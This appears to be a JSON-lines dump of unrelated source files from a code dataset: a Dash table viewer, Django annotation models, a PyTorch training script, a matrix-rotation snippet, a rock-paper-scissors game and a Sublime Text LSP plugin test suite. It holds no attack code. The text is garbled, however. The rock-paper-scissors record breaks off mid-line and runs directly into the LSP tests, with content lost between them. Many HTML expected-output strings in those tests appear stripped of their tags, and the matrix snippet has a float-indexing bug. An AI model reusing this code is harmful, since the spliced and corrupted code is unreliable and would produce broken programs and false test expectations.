print(f'At {conf}% confidence valuation range is')\n print(f'USD {rounded_low} at the lower end to USD, and {rounded_hi} at the high end.')","sub_path":"boston_valuation.py","file_name":"boston_valuation.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525660613","text":"import pandas\nimport dash\nimport dash_table\n\nrr = pandas.read_hdf('./run_report_cache.hd5')\n\n# There is a dash_table bug that prevents filtering with whitespace\nrr = rr.rename(mapper=lambda x: x.replace(' ', '_'), axis='columns')\n\nprint(rr.columns)\n\napp = dash.Dash()\n\napp.layout = dash_table.DataTable(\n id='table',\n columns=[{\"name\": i, \"id\": i} for i in rr.columns],\n data=rr.to_dict('rows'),\n sorting=True,\n # sorting_type='multi',\n filtering=True,\n row_selectable='multi',\n selected_rows=[],\n style_cell_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)',\n },\n ],\n css=[{\n 'selector': '.dash-cell div.dash-cell-value',\n 'rule': 'display: inline; white-space: inherit; overflow: inherit; text-overflow: inherit;'\n }],\n style_cell={\n 'whiteSpace': 'no-wrap',\n 'overflow': 'hidden',\n 'textOverflow': 'ellipsis',\n 'minWidth': 50,\n },\n)\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","sub_path":"runreport/aq.py","file_name":"aq.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"567743913","text":"from abc import abstractmethod\n\nfrom collections_extended import RangeMap\nfrom django.db import models\n\nfrom reqs.models import Policy\n\n\nclass DocNode(models.Model):\n policy = models.ForeignKey(Policy, on_delete=models.CASCADE)\n # e.g. part_447__subpart_A__sect_1__par_b\n identifier = models.CharField(max_length=1024)\n # e.g. par\n node_type = models.CharField(max_length=64)\n # e.g. b\n type_emblem = models.CharField(max_length=16)\n text = models.TextField(blank=True)\n\n left = models.PositiveIntegerField()\n right = models.PositiveIntegerField()\n depth = models.PositiveIntegerField()\n\n class Meta:\n unique_together = ('policy', 'identifier')\n index_together = (\n unique_together,\n )\n\n def descendants(self):\n return self.__class__.objects.filter(\n left__gt=self.left, right__lt=self.right, policy_id=self.policy_id\n ).order_by('left')\n\n def flattened_annotations(self) -> RangeMap:\n \"\"\"Fetch all of our annotations and flatten overlaps arbitrarily (for\n now).\"\"\"\n annotations = RangeMap()\n for fcite in self.footnotecitations.all():\n annotations[fcite.start:fcite.end] = fcite # flattens overlaps\n return annotations\n\n def content(self):\n \"\"\"Query all of our annotation types to markup the content of this\n DocNode. Ensure all text is wrapped in an annotation by wrapping it in\n the PlainText annotation. We'll flatten our overlaps arbitrarily for\n now.\"\"\"\n if not self.text:\n return []\n\n annotations = self.flattened_annotations()\n wrap_all_text(annotations, len(self.text))\n\n return list(annotations.values())\n\n\ndef wrap_all_text(annotations: RangeMap, text_length: int):\n \"\"\"Ensure that all text is in an annotation by wrapping it in\n PlainText.\"\"\"\n ranges = list(annotations.ranges()) # make a copy\n previous_end = 0\n for next_start, next_end, _ in ranges:\n if next_start != previous_end:\n annotations[previous_end:next_start] = PlainText(\n start=previous_end, end=next_start)\n previous_end = next_end\n\n # Account for trailing text\n if previous_end != text_length:\n annotations[previous_end:text_length] = PlainText(\n start=previous_end, end=text_length)\n\n\nclass Annotation(models.Model):\n doc_node = models.ForeignKey(\n DocNode, on_delete=models.CASCADE, related_name='%(class)ss')\n start = models.PositiveIntegerField() # inclusive; within doc_node.text\n end = models.PositiveIntegerField() # exclusive; within doc_node.text\n\n class Meta:\n abstract = True\n\n @property\n @abstractmethod\n def content_type(self):\n raise NotImplementedError()\n\n def serialize_content(self, doc_node=None):\n doc_node = doc_node or self.doc_node\n return {\n 'content_type': self.content_type,\n 'text': doc_node.text[self.start:self.end],\n }\n\n\nclass PlainText(Annotation):\n content_type = '__text__'\n\n class Meta:\n abstract = True\n\n\nclass FootnoteCitation(Annotation):\n content_type = 'footnote_citation'\n footnote_node = models.ForeignKey(\n DocNode, on_delete=models.CASCADE, related_name='+')\n\n def serialize_content(self, doc_node=None):\n result = super().serialize_content(doc_node)\n result['footnote_node'] = self.footnote_node.identifier\n return result\n","sub_path":"api/document/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"206417062","text":"import os\nimport copy\nimport torch\nimport shutil\nimport time\nimport warnings\nimport numpy as np\nimport random\nfrom ops import Augment\nimport torch.nn.functional as F\nfrom torch.nn.utils import clip_grad_norm_\nfrom tensorboardX import SummaryWriter\nfrom opts import parser\nfrom ops.mapmeter import mAPMeter, LTMeter\nfrom ops.utils import AverageMeter, accuracy\n\nfrom ops import losses\nfrom tools import utils\n\nfrom dataset import dutils\nfrom models import models\nfrom ops.feature_loader import BasicDataset, ResamplingDataset_Mask\n\ndef setup_seed(seed):\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\ndef adjust_learning_rate(optimizer, epoch, lr_type, lr_steps):\n if lr_type == 'step':\n decay = 0.1 ** (sum(epoch >= np.array(lr_steps)))\n lr = args.lr * decay\n\n elif lr_type == 'cos':\n import math\n lr = 0.5 * args.lr * (1 + math.cos(math.pi * epoch / args.epochs))\n\n else:\n raise NotImplementedError\n\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\ndef check_rootfolders():\n \"\"\"Create log and model folder\"\"\"\n folders_util = [args.root_log, args.root_model,\n os.path.join(args.root_log, args.store_name),\n os.path.join(args.root_model, args.store_name)]\n for folder in folders_util:\n if not os.path.exists(folder):\n print('creating folder ' + folder)\n os.mkdir(folder)\n\ndef save_checkpoint(state, is_best):\n filename = '%s/%s/ckpt.pth.tar' % (args.root_model, args.store_name)\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, filename.replace('pth.tar', 'best.pth.tar'))\n\ndef load_data(num_class, input_dir):\n train_list = open(args.train_list, 'r').readlines()\n val_list = open(args.val_list, 'r').readlines()\n if args.resample == 'None':\n train_dataset = BasicDataset(train_list, input_dir, args.train_num_frames,\\\n cls_num=num_class, train_mode=True)\n else:\n train_dataset = ResamplingDataset_Mask(train_list, input_dir, args.train_num_frames, \\\n rstype=args.resample, cls_num=args.num_class, train_mode=True)\n val_dataset = BasicDataset(val_list, input_dir, args.val_num_frames, \\\n cls_num=num_class, train_mode=False)\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size, \\\n shuffle=True, num_workers=args.workers, pin_memory=True)\n val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=args.batch_size, \\\n shuffle=False, num_workers=args.workers, pin_memory=True)\n return train_dataloader, val_dataloader\n\ndef main():\n \n global args, best_mAP, criterion, optimizer, tf_writer, log_training\n\n \n best_mAP = 0\n\n args = parser.parse_args()\n start_epoch = args.start_epoch \n num_class = args.num_class\n if args.resample != 'None':\n args.reduce = \"none\"\n print (\"########################################################################\\n\")\n print (\"Feature name: {} \\nNumber of class: {} \\nTrain frames: {} \\nVal frames: {}\\nReduction: {}\".\\\n format(args.feature_name, args.num_class, args.train_num_frames, args.val_num_frames, args.reduce))\n print (\"Applied long-tailed strategies: \\n\")\n print (\"\\tAugmentation: {} \\t Re-weighting: {} \\t Re-sampling: {} \\n\". \\\n format(args.augment, args.loss_func, args.resample))\n print (\"######################################################################## \\n\") \n check_rootfolders()\n setup_seed(args.seed)\n\n input_dir = dutils.get_feature_path(args.feature_name)\n feature_dim = dutils.get_feature_dim(args.feature_name)\n args.lc_list, args.train_list, args.val_list = dutils.get_label_path()\n\n train_loader, val_loader = load_data(num_class, input_dir)\n\n criterion = utils.find_class_by_name(args.loss_func, [losses])(args, logits=True, reduce=args.reduce)\n \n indices = utils.get_indices(args.lc_list, head=args.head, tail=args.tail)\n \n model = utils.find_class_by_name(args.model_name, [models])(feature_dim, num_class) \n model = model.cuda()\n \n if args.resume != \"\": \n print (\"=> Loading checkpoint {}\".format(args.resume))\n \n ckpt = torch.load(args.resume)\n best_mAP = ckpt['best_mAP']\n start_epoch = ckpt['epoch'] + 1\n acc1 = ckpt['Acc@1']\n acc5 = ckpt['Acc@5']\n sd = ckpt['state_dict']\n \n print (\"Loaded checkpoint {} epoch {}: best_mAP {} | Acc@1 {} | Acc@5 {}\". \\\n format(args.resume, start_epoch, best_mAP, acc1, acc5))\n \n model.load_state_dict(sd)\n\n print (\"Params to learn:\")\n params_to_update = []\n for name, param in model.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n print ('\\t', name)\n\n optimizer = torch.optim.Adam(params_to_update, lr=args.lr)\n \n log_training = open(os.path.join(args.root_log, args.store_name, 'log.csv'),'w')\n tf_writer = SummaryWriter(log_dir=os.path.join(args.root_log, args.store_name))\n\n for epoch in range(start_epoch, args.epochs):\n adjust_learning_rate(optimizer, epoch, args.lr_type, args.lr_steps)\n print (\"Training for Epoch {}\".format(epoch))\n if args.resample != \"None\":\n rs_train(train_loader, model, epoch, log_training)\n else:\n train(train_loader, model, epoch, log_training)\n if (epoch + 1) % args.eval_freq == 0 or epoch == args.epochs - 1:\n acc1, acc5, mAP = validate(val_loader, model, epoch, log_training, indices)\n is_best = mAP > best_mAP\n best_mAP = max(mAP, best_mAP)\n tf_writer.add_scalar('best_mAP/test_best', best_mAP, epoch)\n \n print ('Test Epoch {}: Acc@1: {} | Acc@5: {} | mAP: {} | best_mAP: {}'.\\\n format(epoch, acc1, acc5, mAP, best_mAP))\n\n save_checkpoint({\n 'epoch': epoch + 1,\n 'feature': args.feature_name,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'best_mAP': best_mAP,\n 'Acc@1': acc1,\n 'Acc@5': acc5},\n is_best)\n\ndef train(loader, model, epoch, log):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n mAP = mAPMeter()\n\n model.train() \n end = time.time()\n \n if args.loss_func == 'LDAM':\n # apply DRW to LDAM\n criterion.reset_epoch(epoch)\n for i, (vid, feature, target) in enumerate(loader):\n feature = feature.cuda()\n target = target.float().cuda(non_blocking=True)\n \n if args.augment == \"mixup\":\n gamma = np.random.beta(1.0, 1.0)\n mixed_input, mixed_target = Augment.mixup(feature, target, gamma)\n prediction, output = model(mixed_input)\n loss = criterion(output, mixed_target)\n elif args.augment == \"None\":\n prediction, output = model(feature)\n loss = criterion(output, target)\n else:\n print (\"{} not implemented. Please choose ['mixup', 'FrameStack', 'None'].\".\\\n format(args.augment))\n raise NotImplementedError\n \n losses.update(loss.item(), output.size(0))\n\n with torch.no_grad():\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n top1.update(prec1, output.size(0))\n top5.update(prec5, output.size(0))\n \n # accumulate gradient for each parameter\n loss.backward()\n\n if args.clip_gradient is not None:\n total_norm = clip_grad_norm_(model.parameters(), args.clip_gradient)\n \n # update parameters based on current gradients\n optimizer.step()\n optimizer.zero_grad()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n output = ('Epoch: [{0}][{1}/{2}], lr: {lr:.5f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'\n .format(\n epoch, i, len(loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5, \\\n lr=optimizer.param_groups[-1]['lr'])) \n print(output)\n \n log.write(output)\n log.flush()\n \n tf_writer.add_scalar('loss/train_epoch', losses.avg, epoch)\n tf_writer.add_scalar('acc/train_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/train_top5', top5.avg, epoch)\n tf_writer.add_scalar('lr', optimizer.param_groups[-1]['lr'], epoch)\n\ndef validate(loader, model, epoch, log, indices):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n mAP = mAPMeter()\n \n LTmAP =LTMeter(indices)\n model.eval()\n\n end = time.time()\n with torch.no_grad():\n for i, (vid, feature, target) in enumerate(loader):\n feature = feature.cuda()\n target = target.float().cuda()\n \n prediction, output = model(feature)\n \n loss = criterion(output, target)\n\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), feature.size(0))\n top1.update(prec1, feature.size(0))\n top5.update(prec5, feature.size(0))\n\n mAP.add(prediction, target)\n LTmAP.add(prediction, target)\n \n \n batch_time.update(time.time() - end)\n end = time.time()\n\n head_map = LTmAP.value()[\"head\"]\n medium_map = LTmAP.value()[\"medium\"]\n tail_map = LTmAP.value()[\"tail\"]\n \n output = ('Testing Results: Prec@1 {top1.avg:.5f} | Prec@5 {top5.avg:.5f} | Loss {loss.avg:.5f} '\n .format(top1=top1, top5=top5, loss=losses))\n\n print(output)\n lt_output = (\"Overall mAP = {:.3f} | Head = {:.5f} | Medium = {:.5f} | Tail = {:.5f}\".\\\n format(mAP.avg(), head_map, medium_map, tail_map))\n print (lt_output)\n \n if log is not None:\n log.write(output + ' mAP {}\\n'.format(mAP.avg()))\n log.write(lt_output+'\\n')\n log.flush()\n\n if tf_writer is not None:\n tf_writer.add_scalar('loss/test', losses.avg, epoch)\n tf_writer.add_scalar('acc/test_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/test_top5', top5.avg, epoch)\n tf_writer.add_scalar('mAP/test', mAP.avg(), epoch)\n return top1.avg, top5.avg, mAP.avg() \n\ndef rs_train(loader, model, epoch, log):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n mAP = mAPMeter()\n\n model.train() \n end = time.time()\n \n if args.loss_func == 'LDAM':\n # apply DRW to LDAM\n criterion.reset_epoch(epoch)\n for i, (vid, feature, target, mask) in enumerate(loader):\n feature = feature.cuda()\n target = target.float().cuda(non_blocking=True)\n mask = mask.float().cuda()\n\n if args.augment == \"mixup\":\n gamma = np.random.beta(1.0, 1.0)\n mixed_input, mixed_target = Augment.mixup(feature, target, gamma)\n prediction, output = model(mixed_input)\n loss = criterion(output, mixed_target)\n elif args.augment == \"None\":\n prediction, output = model(feature)\n loss = criterion(output, target)\n else:\n print (\"{} not implemented. Please choose ['mixup', 'FrameStack', 'None'].\".\\\n format(args.augment))\n raise NotImplementedError\n\n loss = loss * mask\n loss = torch.mean(torch.sum(loss, 1))\n losses.update(loss.item(), output.size(0))\n\n with torch.no_grad():\n prec1, prec5 = accuracy(output.data, target, topk=(1, 5))\n top1.update(prec1, output.size(0))\n top5.update(prec5, output.size(0))\n \n # accumulate gradient for each parameter\n loss.backward()\n\n if args.clip_gradient is not None:\n total_norm = clip_grad_norm_(model.parameters(), args.clip_gradient)\n \n # update parameters based on current gradients\n optimizer.step()\n optimizer.zero_grad()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n output = ('Epoch: [{0}][{1}/{2}], lr: {lr:.5f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'\n .format(\n epoch, i, len(loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5, \\\n lr=optimizer.param_groups[-1]['lr'])) \n print(output)\n \n log.write(output)\n log.flush()\n \n tf_writer.add_scalar('loss/train_epoch', losses.avg, epoch)\n tf_writer.add_scalar('acc/train_top1', top1.avg, epoch)\n tf_writer.add_scalar('acc/train_top5', top5.avg, epoch)\n tf_writer.add_scalar('lr', optimizer.param_groups[-1]['lr'], epoch)\n\n\nif __name__=='__main__':\n main()\n","sub_path":"base_main.py","file_name":"base_main.py","file_ext":"py","file_size_in_byte":13814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606553570","text":"matrix = [[1, 2, 3, 7],\n [4, 5, 6, 8],\n [4, 5, 6, 9],\n [7, 8, 9, 9]]\n\n\ndef cnext(r, c, degree):\n if r == c:\n if r == 0 and (c + 1) < degree:\n return (r, c + 1)\n if r == degree - 1:\n return (r, c - 1)\n\n if (r < c):\n if c + 1 < degree:\n return (r, c + 1)\n else:\n return (r + 1, c)\n\n if (r > c):\n if c == 0:\n return (r - 1, c)\n else:\n return (r, c - 1)\n\n\ndef rotateMatrix(matrix, length):\n if length == 0 or (len(matrix[0]) != length):\n return None\n\n degree = length\n layers = length / 2\n\n for i in range(layers + 1):\n if degree == 0 or degree == 1:\n break\n\n print(\"starting at degree = \", degree)\n print(i, i)\n next = cnext(i, i, degree)\n while True:\n print(next)\n next = cnext(next[0], next[1], degree)\n if next == (i, i):\n break\n\n degree = degree / 2\n\n\nrotateMatrix(matrix, 4)\n","sub_path":"matrix_rotate.py","file_name":"matrix_rotate.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593604931","text":"import random\r\nplayer = input(\"Please enter rock, paper, or scissors: \")\r\ncomputer = random.randint(0,2)\r\nprint(\"Computer selected: \",end=\"\")\r\nif computer == 0:\r\n computer = \"rock\"\r\n print(computer)\r\nelif computer == 1:\r\n computer = \"paper\"\r\n print(computer)\r\nelse:\r\n computer = \"scissors\"\r\n print(computer)\r\nif player == computer:\r\n print(\"Both players choose\",player,\". No winner\")\r\nelif player == \"scissors\" and computer == \"paper\":\r\n print(player,\" beats \",computer,\". You win!\",sep=\"\")\r\nelif player == \"paper\" and computer == \"scissors\":\r\n print(computer,\" beats \",player,\". You lose!\",sep=\"\")\r\n# Use ASCLL for rock beats scissors and paper beats rock\r\nelse:\r\n if player None:\n super().setUp()\n self.view = sublime.active_window().new_file() # new_file() always returns a ready view\n self.view.set_scratch(True)\n self.mock_file_name = \"C:/Windows\" if sublime.platform() == \"windows\" else \"/etc\"\n self.view.file_name = MagicMock(return_value=self.mock_file_name)\n self.view.run_command(\"insert\", {\"characters\": \"hello world\\nfoo bar baz\"})\n\n def tearDown(self) -> None:\n self.view.close()\n return super().tearDown()\n\n def test_missing_uri(self) -> None:\n self.view.settings().erase(\"lsp_uri\")\n with self.assertRaises(MissingUriError):\n uri_from_view(self.view)\n\n def test_nonmissing_uri(self) -> None:\n\n class MockSettings:\n\n def get(value: str, default: Any) -> Any:\n return \"file:///hello/there.txt\"\n\n mock_settings = MockSettings()\n self.view.settings = MagicMock(return_value=mock_settings)\n uri = uri_from_view(self.view)\n self.assertEqual(uri, \"file:///hello/there.txt\")\n\n def test_did_open(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(did_open(self.view, \"python\").params, {\n \"textDocument\": {\n \"uri\": filename_to_uri(self.mock_file_name),\n \"languageId\": \"python\",\n \"text\": \"hello world\\nfoo bar baz\",\n \"version\": self.view.change_count()\n }\n })\n\n def test_did_change_full(self) -> None:\n version = self.view.change_count()\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(did_change(self.view, version).params, {\n \"textDocument\": {\n \"uri\": filename_to_uri(self.mock_file_name),\n \"version\": version\n },\n \"contentChanges\": [{\"text\": \"hello world\\nfoo bar baz\"}]\n })\n\n def test_will_save(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(will_save(filename_to_uri(self.mock_file_name), 42).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"reason\": 42\n })\n\n def test_will_save_wait_until(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(will_save_wait_until(self.view, 1337).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"reason\": 1337\n })\n\n def test_did_save(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(did_save(self.view, include_text=False).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)}\n })\n self.assertEqual(did_save(self.view, include_text=True).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"text\": \"hello world\\nfoo bar baz\"\n })\n\n def test_text_document_position_params(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(text_document_position_params(self.view, 2), {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"position\": {\"line\": 0, \"character\": 2}\n })\n\n def test_text_document_formatting(self) -> None:\n self.view.settings = MagicMock(return_value={\n \"translate_tabs_to_spaces\": False,\n \"tab_size\": 1234,\n \"ensure_newline_at_eof_on_save\": True,\n \"lsp_uri\": filename_to_uri(self.mock_file_name)\n })\n self.assertEqual(text_document_formatting(self.view).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"options\": {\n \"tabSize\": 1234,\n \"insertSpaces\": False,\n \"trimTrailingWhitespace\": False,\n \"insertFinalNewline\": True,\n \"trimFinalNewlines\": True\n }\n })\n\n def test_text_document_range_formatting(self) -> None:\n self.view.settings = MagicMock(return_value={\n \"tab_size\": 4321,\n \"lsp_uri\": filename_to_uri(self.mock_file_name)\n })\n self.assertEqual(text_document_range_formatting(self.view, sublime.Region(0, 2)).params, {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"options\": {\n \"tabSize\": 4321,\n \"insertSpaces\": False,\n \"trimTrailingWhitespace\": False,\n \"insertFinalNewline\": False,\n \"trimFinalNewlines\": False\n },\n \"range\": {\"start\": {\"line\": 0, \"character\": 0}, \"end\": {\"line\": 0, \"character\": 2}}\n })\n\n def test_point_to_offset(self) -> None:\n first_line_length = len(self.view.line(0))\n self.assertEqual(point_to_offset(Point(1, 2), self.view), first_line_length + 3)\n self.assertEqual(point_to_offset(Point(0, first_line_length + 9999), self.view), first_line_length)\n\n def test_point_to_offset_utf16(self) -> None:\n self.view.run_command(\"insert\", {\"characters\": \"🍺foo\"})\n foobarbaz_length = len(\"foo bar baz\")\n offset = point_to_offset(Point(1, foobarbaz_length), self.view)\n # Sanity check\n self.assertEqual(self.view.substr(offset), \"🍺\")\n # When we move two UTF-16 points further, we should encompass the beer emoji.\n # So that means that the code point offsets should have a difference of 1.\n self.assertEqual(point_to_offset(Point(1, foobarbaz_length + 2), self.view) - offset, 1)\n\n def test_selection_range_params(self) -> None:\n self.view.run_command(\"lsp_selection_set\", {\"regions\": [(0, 5), (6, 11)]})\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(len(self.view.sel()), 2)\n self.assertEqual(self.view.substr(self.view.sel()[0]), \"hello\")\n self.assertEqual(self.view.substr(self.view.sel()[1]), \"world\")\n self.assertEqual(selection_range_params(self.view), {\n \"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)},\n \"positions\": [\n {\"line\": 0, \"character\": 5},\n {\"line\": 0, \"character\": 11}\n ]\n })\n\n def test_minihtml_no_allowed_formats(self) -> None:\n content = \"
text\\n
\"\n with self.assertRaises(Exception):\n minihtml(self.view, content, allowed_formats=0)\n\n def test_minihtml_conflicting_formats(self) -> None:\n content = \"
text\\n
\"\n with self.assertRaises(Exception):\n minihtml(self.view, content, allowed_formats=FORMAT_STRING | FORMAT_MARKED_STRING)\n\n def test_minihtml_format_string(self) -> None:\n content = \"
text\\n
\"\n expect = \"

<div>text
</div>

\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_STRING), expect)\n\n def test_minihtml_format_marked_string(self) -> None:\n content = \"
text\\n
\"\n expect = \"
text\\n
\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKED_STRING), expect)\n\n def test_minihtml_format_markup_content(self) -> None:\n content = {'value': 'This is **bold** text', 'kind': 'markdown'}\n expect = \"

This is bold text

\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_handles_markup_content_plaintext(self) -> None:\n content = {'value': 'type TVec2i = specialize TGVec2', 'kind': 'plaintext'}\n expect = \"

type TVec2i = specialize TGVec2<Integer>

\"\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n self.assertEqual(minihtml(self.view, content, allowed_formats=allowed_formats), expect)\n\n def test_minihtml_handles_marked_string(self) -> None:\n content = {'value': 'import json', 'language': 'python'}\n expect = '
import json
'\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n formatted = self._strip_style_attributes(minihtml(self.view, content, allowed_formats=allowed_formats))\n self.assertEqual(formatted, expect)\n\n def test_minihtml_handles_marked_string_mutiple_spaces(self) -> None:\n content = {'value': 'import json', 'language': 'python'}\n expect = '
import  json
'\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n formatted = self._strip_style_attributes(minihtml(self.view, content, allowed_formats=allowed_formats))\n self.assertEqual(formatted, expect)\n\n def test_minihtml_handles_marked_string_array(self) -> None:\n content = [\n {'value': 'import sys', 'language': 'python'},\n {'value': 'let x', 'language': 'js'}\n ]\n expect = '\\n\\n'.join([\n '
import sys
',\n '
let x
'\n ])\n allowed_formats = FORMAT_MARKED_STRING | FORMAT_MARKUP_CONTENT\n formatted = self._strip_style_attributes(minihtml(self.view, content, allowed_formats=allowed_formats))\n self.assertEqual(formatted, expect)\n\n def test_minihtml_ignores_non_allowed_string(self) -> None:\n content = \"
text\\n
\"\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_ignores_non_allowed_marked_string(self) -> None:\n content = {'value': 'import sys', 'language': 'python'}\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_ignores_non_allowed_marked_string_array(self) -> None:\n content = [\"a\", \"b\"]\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def test_minihtml_ignores_non_allowed_markup_content(self) -> None:\n content = {'value': 'ab', 'kind': 'plaintext'}\n expect = \"\"\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_STRING), expect)\n\n def test_minihtml_magiclinks(self) -> None:\n content = {'value': 'https://github.com/sublimelsp/LSP', 'kind': 'markdown'}\n expect_attributes = [\n 'class=\"magiclink magiclink-github magiclink-repository\"',\n 'href=\"https://github.com/sublimelsp/LSP\"',\n 'title=\"GitHub Repository: sublimelsp/LSP\"'\n ]\n expect = '

sublimelsp/LSP

'.format(' '.join(expect_attributes))\n self.assertEqual(minihtml(self.view, content, allowed_formats=FORMAT_MARKUP_CONTENT), expect)\n\n def _strip_style_attributes(self, content: str) -> str:\n return re.sub(r'\\s+style=\"[^\"]+\"', '', content)\n\n def test_text2html_replaces_tabs_with_br(self) -> None:\n self.assertEqual(text2html(\"Hello,\\t world \"), \"Hello,     world \")\n\n def test_text2html_non_breaking_space_and_control_char_with_entity(self) -> None:\n self.assertEqual(text2html(\"no\\xc2\\xa0breaks\"), \"no  breaks\")\n\n def test_text2html_replaces_two_or_more_spaces_with_nbsp(self) -> None:\n content = \" One Two Three One Four\"\n expect = \" One  Two   Three One    Four\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_does_not_replace_one_space_with_nbsp(self) -> None:\n content = \" John has one apple \"\n self.assertEqual(text2html(content), content)\n\n def test_text2html_replaces_newlines_with_br(self) -> None:\n self.assertEqual(text2html(\"a\\nb\"), \"a
b\")\n\n def test_text2html_parses_link_simple(self) -> None:\n content = \"https://github.com/sublimelsp/LSP\"\n expect = \"https://github.com/sublimelsp/LSP\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_parses_link_in_angle_brackets(self) -> None:\n content = \"\"\n expect = \"<https://github.com/sublimelsp/LSP>\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_parses_link_in_double_quotes(self) -> None:\n content = \"\\\"https://github.com/sublimelsp/LSP\\\"\"\n expect = \"\\\"https://github.com/sublimelsp/LSP\\\"\"\n self.assertEqual(text2html(content), expect)\n\n def test_text2html_parses_link_in_single_quotes(self) -> None:\n content = \"'https://github.com/sublimelsp/LSP'\"\n expect = \"'https://github.com/sublimelsp/LSP'\"\n self.assertEqual(text2html(content), expect)\n\n def test_lsp_color_to_phantom(self) -> None:\n response = [\n {\n \"color\": {\n \"green\": 0.9725490196078431,\n \"blue\": 1,\n \"red\": 0.9411764705882353,\n \"alpha\": 1\n },\n \"range\": {\n \"start\": {\n \"character\": 0,\n \"line\": 0\n },\n \"end\": {\n \"character\": 5,\n \"line\": 0\n }\n }\n }\n ]\n phantom = lsp_color_to_phantom(self.view, response[0])\n self.assertEqual(phantom.content, lsp_color_to_html(response[0]))\n self.assertEqual(phantom.region, range_to_region(response[0][\"range\"], self.view))\n\n def test_document_color_params(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n self.assertEqual(\n document_color_params(self.view),\n {\"textDocument\": {\"uri\": filename_to_uri(self.mock_file_name)}})\n\n def test_text_document_code_action_params(self) -> None:\n self.view.settings().set(\"lsp_uri\", filename_to_uri(self.mock_file_name))\n diagnostic = {\n \"message\": \"oops\",\n \"severity\": 